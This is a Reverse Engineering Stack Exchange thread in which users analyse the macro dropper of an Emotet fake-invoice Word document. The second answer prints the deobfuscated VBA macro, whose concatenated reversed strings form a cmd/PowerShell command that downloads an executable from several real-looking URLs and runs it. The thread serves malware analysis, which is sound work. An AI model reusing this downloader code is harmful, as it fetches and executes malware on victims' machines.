Emotet invoice, what is the embedded file inside the word document












1















This pastebin hosts current URLs hosting the fake invoice of Emotet malware, which is the dropper part of the malware.



The document is a Office Open XML, and there are two large non textual segments in it.



I can't make any sense of the other segment.



One of them is this:enter image description here



I assume the other one contains at least some VB script and something else, but it decodes (assuming base64 like the jpg part) to nothing that file recognizes.










share|improve this question







New contributor




alecail is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.





















  • I got no idea about the nature of this data - maybe the string at the very end (Project tvfvpv autoopen in wide / utf16) could be a clue

    – Nordwald
    yesterday
















1















This pastebin hosts current URLs hosting the fake invoice of Emotet malware, which is the dropper part of the malware.



The document is a Office Open XML, and there are two large non textual segments in it.



I can't make any sense of the other segment.



One of them is this:enter image description here



I assume the other one contains at least some VB script and something else, but it decodes (assuming base64 like the jpg part) to nothing that file recognizes.










share|improve this question







New contributor




alecail is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.





















  • I got no idea about the nature of this data - maybe the string at the very end (Project tvfvpv autoopen in wide / utf16) could be a clue

    – Nordwald
    yesterday














1












1








1








This pastebin hosts current URLs hosting the fake invoice of Emotet malware, which is the dropper part of the malware.



The document is a Office Open XML, and there are two large non textual segments in it.



I can't make any sense of the other segment.



One of them is this:enter image description here



I assume the other one contains at least some VB script and something else, but it decodes (assuming base64 like the jpg part) to nothing that file recognizes.










share|improve this question







New contributor




alecail is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.












This pastebin hosts current URLs hosting the fake invoice of Emotet malware, which is the dropper part of the malware.



The document is a Office Open XML, and there are two large non textual segments in it.



I can't make any sense of the other segment.



One of them is this:enter image description here



I assume the other one contains at least some VB script and something else, but it decodes (assuming base64 like the jpg part) to nothing that file recognizes.







binary-analysis malware






share|improve this question







New contributor




alecail is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.











share|improve this question







New contributor




alecail is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.









share|improve this question




share|improve this question






New contributor




alecail is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.









asked yesterday









alecailalecail

1062




1062




New contributor




alecail is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.





New contributor





alecail is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.






alecail is a new contributor to this site. Take care in asking for clarification, commenting, and answering.
Check out our Code of Conduct.













  • I got no idea about the nature of this data - maybe the string at the very end (Project tvfvpv autoopen in wide / utf16) could be a clue

    – Nordwald
    yesterday



















  • I got no idea about the nature of this data - maybe the string at the very end (Project tvfvpv autoopen in wide / utf16) could be a clue

    – Nordwald
    yesterday

















I got no idea about the nature of this data - maybe the string at the very end (Project tvfvpv autoopen in wide / utf16) could be a clue

– Nordwald
yesterday





I got no idea about the nature of this data - maybe the string at the very end (Project tvfvpv autoopen in wide / utf16) could be a clue

– Nordwald
yesterday










2 Answers
2






active

oldest

votes


















2














Without reviewing the file itself, other than a VB script used as a macro, the second part is more likely an obfuscated/encrypted executable file of some sort.



However since it's evident macros are used, the executable file (either a PE or a script) is probably at least somewhat obfuscated and will only be decoded/decrypted before being it's dropped to disk or something similar.



Statically, your safest bet would be extracting the macro (that isn't hard, macros are pretty noticeable as far as the standard is concerned) and reversing the decoding/deobfuscating method used.



An easier approach would be to let the document drop the executable by opening it and letting the macros run inside a VM, optionally using something like process explorer/api monitor to catch the dropped file.






share|improve this answer
























  • Marcos: pastebin.com/NtDy1qtD

    – Nordwald
    yesterday











  • @Nordwald Thanks. just for completeness, oletools' olevba was able to extract the VB file.

    – alecail
    yesterday



















1














the vba appears to be some thing like this
the functions appears to be useless the zillnp appears to take this string



enter image description here



you can copy paste the strings and concatentate it



Sub foo()
zwrqd = "c:on" + "jzi" + "oi" + "izwolr" + "poic" + "wo" + ".." + ".."
szrtncm = "..win" + "dow" + "ssys" + "tem32" + "cmd." + "exe /c" + " %Pro" + "gram"
uvkplhz = "Data" + ":~0,1" + "%%Pro" + "gra" + "mData:" + "~9," + "2% /" + "V:ON/" + "C" + Chr(34) + "set"
oujod = " SiQ=;" + "'cjq" + "hpb'=" + "qijm" + "nd$}}" + "{hct" + "ac}};"
kbuitlk = "kaerb" + ";'bchk" + "zfb'=" + "dqk" + "zr$" + ";hkjzj" + "lz$ me" + "tI-e" + "kovnI{"
bjzzhsa = " )00" + "004 eg" + "- htg" + "nel.)h" + "kjzjlz" + "$ m" + "etI-t" + "eG((" + " fI;'"


hzipdp = "jrkj" + "ik'=ci" + "ikdj$" + ";)hkjz" + "jlz$" + " ,qjc" + "aki$(" + "eliFd" + "aoln"
wcwhr = "woD.ir" + "hwidj" + "${yrt" + "{)ujb" + "wa$ " + "ni qj" + "cak" + "i$(h"
rmflwpm = "caero" + "f;'" + "exe.'" + Chr(43) + "zbw" + "nifi$" + Chr(43) + "''" + Chr(43) + "pmet" + ":vne"
wuvcz = "$=hkj" + "zjlz" + "$;'ziw" + "mvv'=p" + "zrifo"
kqwok = "h$;'9" + "04' = " + "zbw" + "nifi$;" + "'sc" + "jmbw'" + "=fm" + "sqvii$" + ";)'@"
wzkwjw = "'(t" + "ilpS" + ".'41" + "fpege" + "LDa"
hrzqojk = "jCgKn" + "c/mo" + "c.sse" + "nisub" + "rusoh."
zpftzo = "www//:" + "ptth@" + "Mw6O6" + "3Df_" + "Cm066C" + "cdkU" + "7o/moc"

rnncbhd = ".ai" + "cizy" + "hp.ww" + "w//:pt" + "th@j" + "7OEo_7"
zihij = "MhAbZ" + "p6jnH" + "p/z" + "t.oc.s" + "keeg"
dwpit = "t.liam" + "//:" + "ptt" + "h@8or1" + "uzsd" + "Z8vi" + "e/RXI/" + "sed" + "ulcni-"
wccvfj = "pw/moc" + ".srev" + "ireht" + "ybkram" + "dnal//" + ":ptth" + "@R8Fd3"
zuvtjrq = "N9U" + "mbY" + "BzI/te" + "n.en" + "onil"
afactw = "etoh." + "www/" + "/:ptt" + "h'=ujb" + "wa$;" + "tnei"
worhm = "lCbeW." + "teN t" + "cejbo-" + "wen" + "=ir" + "hwidj$" + ";'imsi"
vaipzq = "zuu'=i" + "ijir" + "wb$ ll" + "%1,3-~" + ":PME" + "T%h%" + "1,4-" + "~:EMA" + "NNOI"
zcdjvo = "SSES%r" + "%1,5~" + ":CILB" + "UP%wo" + "p&&" + "for /"
vwqmd = "L %h i" + "n (65" + "7,-1" + ",0)" + "do s" + "et " + "nu=!"
tlpisj = "nu!!S" + "iQ:~" + "%h," + "1!&" + "&if %h" + " eq" + "u 0 e" + "cho !n"
nsfmr = "u:~-6" + "58!|" + " cmd" + Chr(34) + " "


uhdurz = zwrqd + szrtncm + uvkplhz + oujod + kbuitlk + bjzzhsa
jitovh = hzipdp + wcwhr + rmflwpm + wuvcz + kqwok + wzkwjw + hrzqojk + zpftzo
wwiqv = rnncbhd + zihij + dwpit + wccvfj + zuvtjrq + afactw + worhm + vaipzq + zcdjvo + vwqmd + tlpisj + nsfmr


MsgBox (uhdurz + jitovh + wwiqv)

End Sub





share|improve this answer























    Your Answer








    StackExchange.ready(function() {
    var channelOptions = {
    tags: "".split(" "),
    id: "489"
    };
    initTagRenderer("".split(" "), "".split(" "), channelOptions);

    StackExchange.using("externalEditor", function() {
    // Have to fire editor after snippets, if snippets enabled
    if (StackExchange.settings.snippets.snippetsEnabled) {
    StackExchange.using("snippets", function() {
    createEditor();
    });
    }
    else {
    createEditor();
    }
    });

    function createEditor() {
    StackExchange.prepareEditor({
    heartbeatType: 'answer',
    autoActivateHeartbeat: false,
    convertImagesToLinks: false,
    noModals: true,
    showLowRepImageUploadWarning: true,
    reputationToPostImages: null,
    bindNavPrevention: true,
    postfix: "",
    imageUploader: {
    brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
    contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
    allowUrls: true
    },
    noCode: true, onDemand: true,
    discardSelector: ".discard-answer"
    ,immediatelyShowMarkdownHelp:true
    });


    }
    });






    alecail is a new contributor. Be nice, and check out our Code of Conduct.










    draft saved

    draft discarded


















    StackExchange.ready(
    function () {
    StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2freverseengineering.stackexchange.com%2fquestions%2f20506%2femotet-invoice-what-is-the-embedded-file-inside-the-word-document%23new-answer', 'question_page');
    }
    );

    Post as a guest















    Required, but never shown

























    2 Answers
    2






    active

    oldest

    votes








    2 Answers
    2






    active

    oldest

    votes









    active

    oldest

    votes






    active

    oldest

    votes









    2














    Without reviewing the file itself, other than a VB script used as a macro, the second part is more likely an obfuscated/encrypted executable file of some sort.



    However since it's evident macros are used, the executable file (either a PE or a script) is probably at least somewhat obfuscated and will only be decoded/decrypted before being it's dropped to disk or something similar.



    Statically, your safest bet would be extracting the macro (that isn't hard, macros are pretty noticeable as far as the standard is concerned) and reversing the decoding/deobfuscating method used.



    An easier approach would be to let the document drop the executable by opening it and letting the macros run inside a VM, optionally using something like process explorer/api monitor to catch the dropped file.






    share|improve this answer
























    • Marcos: pastebin.com/NtDy1qtD

      – Nordwald
      yesterday











    • @Nordwald Thanks. just for completeness, oletools' olevba was able to extract the VB file.

      – alecail
      yesterday
















    2














    Without reviewing the file itself, other than a VB script used as a macro, the second part is more likely an obfuscated/encrypted executable file of some sort.



    However since it's evident macros are used, the executable file (either a PE or a script) is probably at least somewhat obfuscated and will only be decoded/decrypted before being it's dropped to disk or something similar.



    Statically, your safest bet would be extracting the macro (that isn't hard, macros are pretty noticeable as far as the standard is concerned) and reversing the decoding/deobfuscating method used.



    An easier approach would be to let the document drop the executable by opening it and letting the macros run inside a VM, optionally using something like process explorer/api monitor to catch the dropped file.






    share|improve this answer
























    • Marcos: pastebin.com/NtDy1qtD

      – Nordwald
      yesterday











    • @Nordwald Thanks. just for completeness, oletools' olevba was able to extract the VB file.

      – alecail
      yesterday














    2












    2








    2







    Without reviewing the file itself, other than a VB script used as a macro, the second part is more likely an obfuscated/encrypted executable file of some sort.



    However since it's evident macros are used, the executable file (either a PE or a script) is probably at least somewhat obfuscated and will only be decoded/decrypted before being it's dropped to disk or something similar.



    Statically, your safest bet would be extracting the macro (that isn't hard, macros are pretty noticeable as far as the standard is concerned) and reversing the decoding/deobfuscating method used.



    An easier approach would be to let the document drop the executable by opening it and letting the macros run inside a VM, optionally using something like process explorer/api monitor to catch the dropped file.






    share|improve this answer













    Without reviewing the file itself, other than a VB script used as a macro, the second part is more likely an obfuscated/encrypted executable file of some sort.



    However since it's evident macros are used, the executable file (either a PE or a script) is probably at least somewhat obfuscated and will only be decoded/decrypted before being it's dropped to disk or something similar.



    Statically, your safest bet would be extracting the macro (that isn't hard, macros are pretty noticeable as far as the standard is concerned) and reversing the decoding/deobfuscating method used.



    An easier approach would be to let the document drop the executable by opening it and letting the macros run inside a VM, optionally using something like process explorer/api monitor to catch the dropped file.







    share|improve this answer












    share|improve this answer



    share|improve this answer










    answered yesterday









    NirIzrNirIzr

    9,20212270




    9,20212270













    • Marcos: pastebin.com/NtDy1qtD

      – Nordwald
      yesterday











    • @Nordwald Thanks. just for completeness, oletools' olevba was able to extract the VB file.

      – alecail
      yesterday



















    • Marcos: pastebin.com/NtDy1qtD

      – Nordwald
      yesterday











    • @Nordwald Thanks. just for completeness, oletools' olevba was able to extract the VB file.

      – alecail
      yesterday

















    Marcos: pastebin.com/NtDy1qtD

    – Nordwald
    yesterday





    Marcos: pastebin.com/NtDy1qtD

    – Nordwald
    yesterday













    @Nordwald Thanks. just for completeness, oletools' olevba was able to extract the VB file.

    – alecail
    yesterday





    @Nordwald Thanks. just for completeness, oletools' olevba was able to extract the VB file.

    – alecail
    yesterday











    1














    the vba appears to be some thing like this
    the functions appears to be useless the zillnp appears to take this string



    enter image description here



    you can copy paste the strings and concatentate it



    Sub foo()
    zwrqd = "c:on" + "jzi" + "oi" + "izwolr" + "poic" + "wo" + ".." + ".."
    szrtncm = "..win" + "dow" + "ssys" + "tem32" + "cmd." + "exe /c" + " %Pro" + "gram"
    uvkplhz = "Data" + ":~0,1" + "%%Pro" + "gra" + "mData:" + "~9," + "2% /" + "V:ON/" + "C" + Chr(34) + "set"
    oujod = " SiQ=;" + "'cjq" + "hpb'=" + "qijm" + "nd$}}" + "{hct" + "ac}};"
    kbuitlk = "kaerb" + ";'bchk" + "zfb'=" + "dqk" + "zr$" + ";hkjzj" + "lz$ me" + "tI-e" + "kovnI{"
    bjzzhsa = " )00" + "004 eg" + "- htg" + "nel.)h" + "kjzjlz" + "$ m" + "etI-t" + "eG((" + " fI;'"


    hzipdp = "jrkj" + "ik'=ci" + "ikdj$" + ";)hkjz" + "jlz$" + " ,qjc" + "aki$(" + "eliFd" + "aoln"
    wcwhr = "woD.ir" + "hwidj" + "${yrt" + "{)ujb" + "wa$ " + "ni qj" + "cak" + "i$(h"
    rmflwpm = "caero" + "f;'" + "exe.'" + Chr(43) + "zbw" + "nifi$" + Chr(43) + "''" + Chr(43) + "pmet" + ":vne"
    wuvcz = "$=hkj" + "zjlz" + "$;'ziw" + "mvv'=p" + "zrifo"
    kqwok = "h$;'9" + "04' = " + "zbw" + "nifi$;" + "'sc" + "jmbw'" + "=fm" + "sqvii$" + ";)'@"
    wzkwjw = "'(t" + "ilpS" + ".'41" + "fpege" + "LDa"
    hrzqojk = "jCgKn" + "c/mo" + "c.sse" + "nisub" + "rusoh."
    zpftzo = "www//:" + "ptth@" + "Mw6O6" + "3Df_" + "Cm066C" + "cdkU" + "7o/moc"

    rnncbhd = ".ai" + "cizy" + "hp.ww" + "w//:pt" + "th@j" + "7OEo_7"
    zihij = "MhAbZ" + "p6jnH" + "p/z" + "t.oc.s" + "keeg"
    dwpit = "t.liam" + "//:" + "ptt" + "h@8or1" + "uzsd" + "Z8vi" + "e/RXI/" + "sed" + "ulcni-"
    wccvfj = "pw/moc" + ".srev" + "ireht" + "ybkram" + "dnal//" + ":ptth" + "@R8Fd3"
    zuvtjrq = "N9U" + "mbY" + "BzI/te" + "n.en" + "onil"
    afactw = "etoh." + "www/" + "/:ptt" + "h'=ujb" + "wa$;" + "tnei"
    worhm = "lCbeW." + "teN t" + "cejbo-" + "wen" + "=ir" + "hwidj$" + ";'imsi"
    vaipzq = "zuu'=i" + "ijir" + "wb$ ll" + "%1,3-~" + ":PME" + "T%h%" + "1,4-" + "~:EMA" + "NNOI"
    zcdjvo = "SSES%r" + "%1,5~" + ":CILB" + "UP%wo" + "p&&" + "for /"
    vwqmd = "L %h i" + "n (65" + "7,-1" + ",0)" + "do s" + "et " + "nu=!"
    tlpisj = "nu!!S" + "iQ:~" + "%h," + "1!&" + "&if %h" + " eq" + "u 0 e" + "cho !n"
    nsfmr = "u:~-6" + "58!|" + " cmd" + Chr(34) + " "


    uhdurz = zwrqd + szrtncm + uvkplhz + oujod + kbuitlk + bjzzhsa
    jitovh = hzipdp + wcwhr + rmflwpm + wuvcz + kqwok + wzkwjw + hrzqojk + zpftzo
    wwiqv = rnncbhd + zihij + dwpit + wccvfj + zuvtjrq + afactw + worhm + vaipzq + zcdjvo + vwqmd + tlpisj + nsfmr


    MsgBox (uhdurz + jitovh + wwiqv)

    End Sub





    share|improve this answer




























      1














      the vba appears to be some thing like this
      the functions appears to be useless the zillnp appears to take this string



      enter image description here



      you can copy paste the strings and concatentate it



      Sub foo()
      zwrqd = "c:on" + "jzi" + "oi" + "izwolr" + "poic" + "wo" + ".." + ".."
      szrtncm = "..win" + "dow" + "ssys" + "tem32" + "cmd." + "exe /c" + " %Pro" + "gram"
      uvkplhz = "Data" + ":~0,1" + "%%Pro" + "gra" + "mData:" + "~9," + "2% /" + "V:ON/" + "C" + Chr(34) + "set"
      oujod = " SiQ=;" + "'cjq" + "hpb'=" + "qijm" + "nd$}}" + "{hct" + "ac}};"
      kbuitlk = "kaerb" + ";'bchk" + "zfb'=" + "dqk" + "zr$" + ";hkjzj" + "lz$ me" + "tI-e" + "kovnI{"
      bjzzhsa = " )00" + "004 eg" + "- htg" + "nel.)h" + "kjzjlz" + "$ m" + "etI-t" + "eG((" + " fI;'"


      hzipdp = "jrkj" + "ik'=ci" + "ikdj$" + ";)hkjz" + "jlz$" + " ,qjc" + "aki$(" + "eliFd" + "aoln"
      wcwhr = "woD.ir" + "hwidj" + "${yrt" + "{)ujb" + "wa$ " + "ni qj" + "cak" + "i$(h"
      rmflwpm = "caero" + "f;'" + "exe.'" + Chr(43) + "zbw" + "nifi$" + Chr(43) + "''" + Chr(43) + "pmet" + ":vne"
      wuvcz = "$=hkj" + "zjlz" + "$;'ziw" + "mvv'=p" + "zrifo"
      kqwok = "h$;'9" + "04' = " + "zbw" + "nifi$;" + "'sc" + "jmbw'" + "=fm" + "sqvii$" + ";)'@"
      wzkwjw = "'(t" + "ilpS" + ".'41" + "fpege" + "LDa"
      hrzqojk = "jCgKn" + "c/mo" + "c.sse" + "nisub" + "rusoh."
      zpftzo = "www//:" + "ptth@" + "Mw6O6" + "3Df_" + "Cm066C" + "cdkU" + "7o/moc"

      rnncbhd = ".ai" + "cizy" + "hp.ww" + "w//:pt" + "th@j" + "7OEo_7"
      zihij = "MhAbZ" + "p6jnH" + "p/z" + "t.oc.s" + "keeg"
      dwpit = "t.liam" + "//:" + "ptt" + "h@8or1" + "uzsd" + "Z8vi" + "e/RXI/" + "sed" + "ulcni-"
      wccvfj = "pw/moc" + ".srev" + "ireht" + "ybkram" + "dnal//" + ":ptth" + "@R8Fd3"
      zuvtjrq = "N9U" + "mbY" + "BzI/te" + "n.en" + "onil"
      afactw = "etoh." + "www/" + "/:ptt" + "h'=ujb" + "wa$;" + "tnei"
      worhm = "lCbeW." + "teN t" + "cejbo-" + "wen" + "=ir" + "hwidj$" + ";'imsi"
      vaipzq = "zuu'=i" + "ijir" + "wb$ ll" + "%1,3-~" + ":PME" + "T%h%" + "1,4-" + "~:EMA" + "NNOI"
      zcdjvo = "SSES%r" + "%1,5~" + ":CILB" + "UP%wo" + "p&&" + "for /"
      vwqmd = "L %h i" + "n (65" + "7,-1" + ",0)" + "do s" + "et " + "nu=!"
      tlpisj = "nu!!S" + "iQ:~" + "%h," + "1!&" + "&if %h" + " eq" + "u 0 e" + "cho !n"
      nsfmr = "u:~-6" + "58!|" + " cmd" + Chr(34) + " "


      uhdurz = zwrqd + szrtncm + uvkplhz + oujod + kbuitlk + bjzzhsa
      jitovh = hzipdp + wcwhr + rmflwpm + wuvcz + kqwok + wzkwjw + hrzqojk + zpftzo
      wwiqv = rnncbhd + zihij + dwpit + wccvfj + zuvtjrq + afactw + worhm + vaipzq + zcdjvo + vwqmd + tlpisj + nsfmr


      MsgBox (uhdurz + jitovh + wwiqv)

      End Sub





      share|improve this answer


























        1












        1








        1







        the vba appears to be some thing like this
        the functions appears to be useless the zillnp appears to take this string



        enter image description here



        you can copy paste the strings and concatentate it



        Sub foo()
        zwrqd = "c:on" + "jzi" + "oi" + "izwolr" + "poic" + "wo" + ".." + ".."
        szrtncm = "..win" + "dow" + "ssys" + "tem32" + "cmd." + "exe /c" + " %Pro" + "gram"
        uvkplhz = "Data" + ":~0,1" + "%%Pro" + "gra" + "mData:" + "~9," + "2% /" + "V:ON/" + "C" + Chr(34) + "set"
        oujod = " SiQ=;" + "'cjq" + "hpb'=" + "qijm" + "nd$}}" + "{hct" + "ac}};"
        kbuitlk = "kaerb" + ";'bchk" + "zfb'=" + "dqk" + "zr$" + ";hkjzj" + "lz$ me" + "tI-e" + "kovnI{"
        bjzzhsa = " )00" + "004 eg" + "- htg" + "nel.)h" + "kjzjlz" + "$ m" + "etI-t" + "eG((" + " fI;'"


        hzipdp = "jrkj" + "ik'=ci" + "ikdj$" + ";)hkjz" + "jlz$" + " ,qjc" + "aki$(" + "eliFd" + "aoln"
        wcwhr = "woD.ir" + "hwidj" + "${yrt" + "{)ujb" + "wa$ " + "ni qj" + "cak" + "i$(h"
        rmflwpm = "caero" + "f;'" + "exe.'" + Chr(43) + "zbw" + "nifi$" + Chr(43) + "''" + Chr(43) + "pmet" + ":vne"
        wuvcz = "$=hkj" + "zjlz" + "$;'ziw" + "mvv'=p" + "zrifo"
        kqwok = "h$;'9" + "04' = " + "zbw" + "nifi$;" + "'sc" + "jmbw'" + "=fm" + "sqvii$" + ";)'@"
        wzkwjw = "'(t" + "ilpS" + ".'41" + "fpege" + "LDa"
        hrzqojk = "jCgKn" + "c/mo" + "c.sse" + "nisub" + "rusoh."
        zpftzo = "www//:" + "ptth@" + "Mw6O6" + "3Df_" + "Cm066C" + "cdkU" + "7o/moc"

        rnncbhd = ".ai" + "cizy" + "hp.ww" + "w//:pt" + "th@j" + "7OEo_7"
        zihij = "MhAbZ" + "p6jnH" + "p/z" + "t.oc.s" + "keeg"
        dwpit = "t.liam" + "//:" + "ptt" + "h@8or1" + "uzsd" + "Z8vi" + "e/RXI/" + "sed" + "ulcni-"
        wccvfj = "pw/moc" + ".srev" + "ireht" + "ybkram" + "dnal//" + ":ptth" + "@R8Fd3"
        zuvtjrq = "N9U" + "mbY" + "BzI/te" + "n.en" + "onil"
        afactw = "etoh." + "www/" + "/:ptt" + "h'=ujb" + "wa$;" + "tnei"
        worhm = "lCbeW." + "teN t" + "cejbo-" + "wen" + "=ir" + "hwidj$" + ";'imsi"
        vaipzq = "zuu'=i" + "ijir" + "wb$ ll" + "%1,3-~" + ":PME" + "T%h%" + "1,4-" + "~:EMA" + "NNOI"
        zcdjvo = "SSES%r" + "%1,5~" + ":CILB" + "UP%wo" + "p&&" + "for /"
        vwqmd = "L %h i" + "n (65" + "7,-1" + ",0)" + "do s" + "et " + "nu=!"
        tlpisj = "nu!!S" + "iQ:~" + "%h," + "1!&" + "&if %h" + " eq" + "u 0 e" + "cho !n"
        nsfmr = "u:~-6" + "58!|" + " cmd" + Chr(34) + " "


        uhdurz = zwrqd + szrtncm + uvkplhz + oujod + kbuitlk + bjzzhsa
        jitovh = hzipdp + wcwhr + rmflwpm + wuvcz + kqwok + wzkwjw + hrzqojk + zpftzo
        wwiqv = rnncbhd + zihij + dwpit + wccvfj + zuvtjrq + afactw + worhm + vaipzq + zcdjvo + vwqmd + tlpisj + nsfmr


        MsgBox (uhdurz + jitovh + wwiqv)

        End Sub





        share|improve this answer













        the vba appears to be some thing like this
        the functions appears to be useless the zillnp appears to take this string



        enter image description here



        you can copy paste the strings and concatentate it



        Sub foo()
        zwrqd = "c:on" + "jzi" + "oi" + "izwolr" + "poic" + "wo" + ".." + ".."
        szrtncm = "..win" + "dow" + "ssys" + "tem32" + "cmd." + "exe /c" + " %Pro" + "gram"
        uvkplhz = "Data" + ":~0,1" + "%%Pro" + "gra" + "mData:" + "~9," + "2% /" + "V:ON/" + "C" + Chr(34) + "set"
        oujod = " SiQ=;" + "'cjq" + "hpb'=" + "qijm" + "nd$}}" + "{hct" + "ac}};"
        kbuitlk = "kaerb" + ";'bchk" + "zfb'=" + "dqk" + "zr$" + ";hkjzj" + "lz$ me" + "tI-e" + "kovnI{"
        bjzzhsa = " )00" + "004 eg" + "- htg" + "nel.)h" + "kjzjlz" + "$ m" + "etI-t" + "eG((" + " fI;'"


        hzipdp = "jrkj" + "ik'=ci" + "ikdj$" + ";)hkjz" + "jlz$" + " ,qjc" + "aki$(" + "eliFd" + "aoln"
        wcwhr = "woD.ir" + "hwidj" + "${yrt" + "{)ujb" + "wa$ " + "ni qj" + "cak" + "i$(h"
        rmflwpm = "caero" + "f;'" + "exe.'" + Chr(43) + "zbw" + "nifi$" + Chr(43) + "''" + Chr(43) + "pmet" + ":vne"
        wuvcz = "$=hkj" + "zjlz" + "$;'ziw" + "mvv'=p" + "zrifo"
        kqwok = "h$;'9" + "04' = " + "zbw" + "nifi$;" + "'sc" + "jmbw'" + "=fm" + "sqvii$" + ";)'@"
        wzkwjw = "'(t" + "ilpS" + ".'41" + "fpege" + "LDa"
        hrzqojk = "jCgKn" + "c/mo" + "c.sse" + "nisub" + "rusoh."
        zpftzo = "www//:" + "ptth@" + "Mw6O6" + "3Df_" + "Cm066C" + "cdkU" + "7o/moc"

        rnncbhd = ".ai" + "cizy" + "hp.ww" + "w//:pt" + "th@j" + "7OEo_7"
        zihij = "MhAbZ" + "p6jnH" + "p/z" + "t.oc.s" + "keeg"
        dwpit = "t.liam" + "//:" + "ptt" + "h@8or1" + "uzsd" + "Z8vi" + "e/RXI/" + "sed" + "ulcni-"
        wccvfj = "pw/moc" + ".srev" + "ireht" + "ybkram" + "dnal//" + ":ptth" + "@R8Fd3"
        zuvtjrq = "N9U" + "mbY" + "BzI/te" + "n.en" + "onil"
        afactw = "etoh." + "www/" + "/:ptt" + "h'=ujb" + "wa$;" + "tnei"
        worhm = "lCbeW." + "teN t" + "cejbo-" + "wen" + "=ir" + "hwidj$" + ";'imsi"
        vaipzq = "zuu'=i" + "ijir" + "wb$ ll" + "%1,3-~" + ":PME" + "T%h%" + "1,4-" + "~:EMA" + "NNOI"
        zcdjvo = "SSES%r" + "%1,5~" + ":CILB" + "UP%wo" + "p&&" + "for /"
        vwqmd = "L %h i" + "n (65" + "7,-1" + ",0)" + "do s" + "et " + "nu=!"
        tlpisj = "nu!!S" + "iQ:~" + "%h," + "1!&" + "&if %h" + " eq" + "u 0 e" + "cho !n"
        nsfmr = "u:~-6" + "58!|" + " cmd" + Chr(34) + " "


        uhdurz = zwrqd + szrtncm + uvkplhz + oujod + kbuitlk + bjzzhsa
        jitovh = hzipdp + wcwhr + rmflwpm + wuvcz + kqwok + wzkwjw + hrzqojk + zpftzo
        wwiqv = rnncbhd + zihij + dwpit + wccvfj + zuvtjrq + afactw + worhm + vaipzq + zcdjvo + vwqmd + tlpisj + nsfmr


        MsgBox (uhdurz + jitovh + wwiqv)

        End Sub






        share|improve this answer












        share|improve this answer



        share|improve this answer










        answered yesterday









        blabbblabb

        9,3231724




        9,3231724






















            alecail is a new contributor. Be nice, and check out our Code of Conduct.










            draft saved

            draft discarded


















            alecail is a new contributor. Be nice, and check out our Code of Conduct.













            alecail is a new contributor. Be nice, and check out our Code of Conduct.












            alecail is a new contributor. Be nice, and check out our Code of Conduct.
















            Thanks for contributing an answer to Reverse Engineering Stack Exchange!


            • Please be sure to answer the question. Provide details and share your research!

            But avoid



            • Asking for help, clarification, or responding to other answers.

            • Making statements based on opinion; back them up with references or personal experience.


            To learn more, see our tips on writing great answers.




            draft saved


            draft discarded














            StackExchange.ready(
            function () {
            StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2freverseengineering.stackexchange.com%2fquestions%2f20506%2femotet-invoice-what-is-the-embedded-file-inside-the-word-document%23new-answer', 'question_page');
            }
            );

            Post as a guest















            Required, but never shown





















































            Required, but never shown














            Required, but never shown












            Required, but never shown







            Required, but never shown

































            Required, but never shown














            Required, but never shown












            Required, but never shown







            Required, but never shown







            Popular posts from this blog

            "Incorrect syntax near the keyword 'ON'. (on update cascade, on delete cascade,)

            Alcedinidae

            Origin of the phrase “under your belt”?